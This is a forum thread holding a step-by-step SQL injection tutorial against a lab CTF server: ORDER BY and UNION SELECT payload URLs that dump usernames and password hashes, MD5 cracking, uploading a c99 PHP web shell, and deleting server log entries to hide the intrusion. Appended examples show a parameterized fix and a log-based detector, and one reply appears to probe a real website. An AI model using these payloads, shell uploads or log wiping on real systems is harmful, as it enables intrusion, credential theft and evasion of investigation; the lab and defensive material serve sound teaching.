Advanced SQL Injection Tutorial - Complete website rooting
12-19-2010, 01:38 PM (This post was last modified: 02-10-2011 03:07 PM by Abhi_M.)
Post: #1
Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell"

Now the process


Step 1:

I'm on the home page of the website now

Code:
http://192.168.132.128/

[Image: mantrahackbar1.jpg]



Step 2:

I went through all the pages of the web site and found a page with URL input

Code:
http://192.168.132.128/?id=13

[Image: mantrahackbar2.jpg]



Step 3:

I launched Hackbar by pressing F9

[Image: mantrahackbar3.jpg]



Step 4:

The power of the single quote. I'm checking whether the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

Code:
http://192.168.132.128/?id=13'

[Image: mantrahackbar4.jpg]


Since the page content is different from the previous one, I can be sure that the web page is vulnerable.


Step 5:

Let's find out the number of tables

Code:
http://192.168.132.128/?id=13 order by 1

[Image: mantrahackbar6.jpg]



Step 6:

I have to keep on increasing the last number till I see any change in the page. In usual practice it's going to be a tedious task since there will be hundreds and thousands of tables, if not more. But with this tool I can simply press the + button till I see any change on the webpage

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar7.jpg]




Step 7:

I went up to 7 and there is no change till now

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar12.jpg]




Step 8:

I'm on 8 now and I can see the page changed

Code:
http://192.168.132.128/?id=13 order by 8

[Image: mantrahackbar13.jpg]




Step 9:

Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT

[Image: mantrahackbar14.jpg]




Step 10:

I provided the number of tables. Since I got a different page on table 8, I can be sure that table 8 does not exist and there are only 7 tables

[Image: mantrahackbar16.jpg]




Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let's take the number 2

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7


[Image: mantrahackbar19.jpg]




Step 12:

I replaced the number 2 in the URL with another SQL command; it got executed and the result is displayed on the page

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

[Image: mantrahackbar21.jpg]


The current user is cms_user@localhost



Step 13:

Let's find out the version of the database. I replaced 2 in the URL with the version() command

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

[Image: mantrahackbar22.jpg]


5.0.45 is the version



Step 14:

Let me list all the tables

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

[Image: mantrahackbar23.jpg]


From this list I found "user" is an interesting table



Step 15:

Now I listed all the columns and it's a big list

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

[Image: mantrahackbar24.jpg]




Step 16:

I want columns from the table "user" and nothing else

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

[Image: mantrahackbar25.jpg]




Step 17:

Let's find the user name

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

[Image: mantrahackbar27.jpg]




Step 18:

Now, what about the password?

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

[Image: mantrahackbar26.jpg]


It's encrypted



Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into Hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

[Image: mantrahackbar30.jpg]




Step 20:

Voila! I got the password

[Image: mantrahackbar31.jpg]




Step 21:

Finding the login page. It was right in front of me
[Image: mantrahackbar32.jpg]




Step 22:

Logging in with the credentials I have
[Image: mantrahackbar33.jpg]




Step 23:

Greetings!

[Image: mantrahackbar35.jpg]




Step 24:

I'm an admin now. Look at my powers.

[Image: mantrahackbar36.jpg]




Step 25:

Let me add an event

[Image: mantrahackbar37.jpg]




Step 26:

And of course I want to upload a picture

[Image: mantrahackbar38.jpg]




Step 27:

Let's see whether it allows me to upload the shell or not

[Image: mantrahackbar39.jpg]




Step 28:

Now I'm pressing the "Add Event" button

[Image: mantrahackbar40.jpg]




Step 29:

Nice. Looks like it got uploaded

[Image: mantrahackbar41.jpg]




Step 30:

Let's see where the shell got uploaded to

[Image: mantrahackbar42.jpg]




Step 31:

I'm trying to get the default upload location

[Image: mantrahackbar43.jpg]


[Image: mantrahackbar44.jpg]




Step 32:

Looks like I got it

[Image: mantrahackbar45.jpg]


Let me click on the c9shell.php file I just uploaded



Step 33:

Voila. I have shell access

[Image: mantrahackbar46.jpg]




Step 34:

I simply clicked on the up button to get the root folder

[Image: mantrahackbar48.jpg]


Now I can do whatever I wish: deface the website, maintain access or whatever. But it's out of the scope of the current tutorial



Step 35:

What I'm interested in is the log folder

[Image: mantrahackbar49.jpg]





Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks

[Image: mantrahackbar51.jpg]




Step 37:

Let me go back and edit the log file

[Image: mantrahackbar52.jpg]


[Image: mantrahackbar53.jpg]




Step 38:

I deleted all the log entries. Now saving it.

[Image: mantrahackbar54.jpg]




Step 39:

Nice. The log file is empty now

[Image: mantrahackbar56.jpg]




Step 40:

Now, let's remove the c99 shell by pressing Self Remove

[Image: mantrahackbar57.jpg]




Step 41:

Confirmed!

[Image: mantrahackbar58.jpg]




Step 42:

OK. Good Bye C99

[Image: mantrahackbar59.jpg]




Step 43:

Well, it deleted itself

[Image: mantrahackbar60.jpg]


Reference:

1. Infond tutorial

Happy Hacking!

Use Mantra forums.
Please do not PM/E-mail me regarding any technical queries straight away.
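Added example, not code from the original post or from the CTF application: the string-built query that makes the UNION payload of step 12 run as written, next to a parameterized version that rejects it, reproduced in SQLite with a constructed schema. The number probed with ORDER BY and matched in the UNION (steps 5 to 11) is the column count of the page's own SELECT, which is three in this toy rather than the tutorial's seven.

```python
import sqlite3

# Constructed sample schema standing in for the CTF's "user" table (not the
# original app's schema); the hash column holds a placeholder, not a real hash.
SCHEMA = """
CREATE TABLE content(id INTEGER, title TEXT, body TEXT);
INSERT INTO content VALUES (13, 'Welcome', 'home page text');
CREATE TABLE user(user_username TEXT, user_password TEXT);
INSERT INTO user VALUES ('admin', '<placeholder-md5-hash>');
"""

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def fetch_vulnerable(conn, id_param):
    """String-built query: the 'id' value from the URL becomes part of the
    SQL text, so a value such as '13 UNION SELECT ...' is executed as written
    (the defect in the tutorial's target page, reproduced in SQLite)."""
    sql = "SELECT id, title, body FROM content WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def fetch_parameterized(conn, id_param):
    """Hardened form: the id must parse as an integer and is bound as a
    parameter, so SQL text in the input can never change the statement."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []  # anything that is not a plain integer id is refused
    sql = "SELECT id, title, body FROM content WHERE id=?"
    return conn.execute(sql, (id_value,)).fetchall()

# Payload in the shape the tutorial uses, sized for this page's three columns
PAYLOAD = "13 UNION SELECT 1,user_username||':'||user_password,3 FROM user"

def demo():
    """Run both versions against the same input; returns
    (rows from vulnerable query, rows from hardened query, rows for a plain id)."""
    conn = make_db()
    return (fetch_vulnerable(conn, PAYLOAD),
            fetch_parameterized(conn, PAYLOAD),
            fetch_parameterized(conn, "13"))
```

Running demo() shows the vulnerable query returning the genuine row plus the injected admin row, while the hardened query returns nothing for the payload and only the requested row for a plain id.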
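Steps 36 to 39 show why a log kept only on the web server is weak evidence: the attacker who reached the shell could wipe it. The same probes are easy to flag in a copy of the access log shipped off the host. As an added example (not from the thread or from Mantra), a small classifier over constructed Apache-format lines that URL-decodes each request and flags the quote, ORDER BY, UNION SELECT and information_schema patterns used above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in Apache combined format (not from the
# thread's target server); requests are URL-encoded as a browser would send them.
SAMPLE_LOG = """\
192.168.132.1 - - [19/Dec/2010:13:10:01 +0000] "GET /?id=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.132.1 - - [19/Dec/2010:13:10:09 +0000] "GET /?id=13%27 HTTP/1.1" 200 3012 "-" "Mozilla/5.0"
192.168.132.1 - - [19/Dec/2010:13:11:20 +0000] "GET /?id=13%20order%20by%208 HTTP/1.1" 200 3012 "-" "Mozilla/5.0"
192.168.132.1 - - [19/Dec/2010:13:12:45 +0000] "GET /?id=13+UNION+SELECT+1,table_name,3,4,5,6,7+from+information_schema.tables HTTP/1.1" 200 9800 "-" "Mozilla/5.0"
192.168.132.1 - - [19/Dec/2010:13:15:02 +0000] "GET /?id=14 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Each rule is named after the probe it catches. Patterns run on the decoded,
# lower-cased request target so %20, + and mixed case do not hide them.
RULES = {
    "quote_probe": re.compile(r"[?&]id=\d+'"),
    "order_by_enum": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_read": re.compile(r"\binformation_schema\."),
}

def decoded_target(line):
    """Extract the request target from a log line and URL-decode it."""
    m = REQUEST_RE.search(line)
    return unquote_plus(m.group(1)).lower() if m else ""

def classify(line):
    """Return the names of every rule the request matches (empty if clean)."""
    target = decoded_target(line)
    return [name for name, rx in RULES.items() if rx.search(target)]

def scan(log_text):
    """Map each suspicious line's decoded request target to its matched rules."""
    hits = {}
    for line in log_text.splitlines():
        names = classify(line)
        if names:
            hits[decoded_target(line)] = names
    return hits
```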
01-29-2011, 05:10 AM
Post: #2
RE: Advanced SQL Injection Tutorial - Complete website rooting
Cool!!
08-24-2011, 12:17 PM
Post: #3
RE: Advanced SQL Injection Tutorial - Complete website rooting
nice tutorial
02-18-2013, 07:32 AM
Post: #4
RE: Advanced SQL Injection Tutorial - Complete website rooting
Nice tutorial mate... But where is the rooting section? We can easily root that CentOS server; it has a 2.6.18-164 kernel...
04-03-2013, 01:49 AM
Post: #5
RE: Advanced SQL Injection Tutorial - Complete website rooting
(02-18-2013 07:32 AM)Un0wn_X Wrote:  Nice tutorial mate... But where is Rooting section? We can easily root that Centos server it has a 2.6.18-164 kernel...

You got me there, I never finished the tutorial.
Then later on I thought it's just a matter of a few searches on the Internet on how to do that, and it does not necessarily need Mantra. But that's not an excuse when the title says "rooting".

Will look into updating the post. Or better, you can write a short tutorial for all of us.

05-10-2013, 03:42 PM
Post: #6
RE: Advanced SQL Injection Tutorial - Complete website rooting
Hi sir, good day.
what kind of toolbar is this?
[Image: 17687013875a576a98d21b94767d8f1b9193bc72.png]


it makes order by 1, order by 2 easy to type
05-17-2013, 01:51 PM
Post: #7
RE: Advanced SQL Injection Tutorial - Complete website rooting
(05-10-2013 03:42 PM)asapol Wrote:  hi sir good day
what kind of toolbar is this?
[Image: 17687013875a576a98d21b94767d8f1b9193bc72.png]


it makes order by 1, order by 2 easy to type

It's one of my favorite extensions, Hackbar:
http://secpedia.net/wiki/Hackbar
https://addons.mozilla.org/en-US/firefox/addon/hackbar/

08-26-2013, 12:45 AM (This post was last modified: 09-06-2013 04:57 AM by mantra.)
Post: #8
RE: Advanced SQL Injection Tutorial - Complete website rooting
Please help me.
When I use order by .. on a website I get the error: Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/content/27/9872627/html/includes/header.html on line 61

I keep on increasing the last number but I don't see any changes in the page.
Why?
Sorry, my English is not good.
http://www.<removed_website_name>....p?pid=219'